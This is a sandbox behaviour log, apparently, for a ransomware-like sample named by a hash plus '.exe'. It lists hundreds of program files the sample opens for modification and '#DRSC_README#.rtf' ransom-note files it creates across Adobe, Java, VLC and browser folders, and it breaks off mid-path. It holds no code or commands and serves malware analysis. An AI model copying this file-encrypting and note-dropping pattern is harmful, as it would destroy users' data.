C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\rmic.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\schemagen.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\policytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Close2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ru.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_unshare_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_sv.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\sysinfo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-focus.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\action_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\InvokeAssert.cab 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyclient.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\dot_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nothumbnail_34.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.access 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\core_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sv.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\SY______.PFM 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\RELEASE-NOTES.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reminders_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 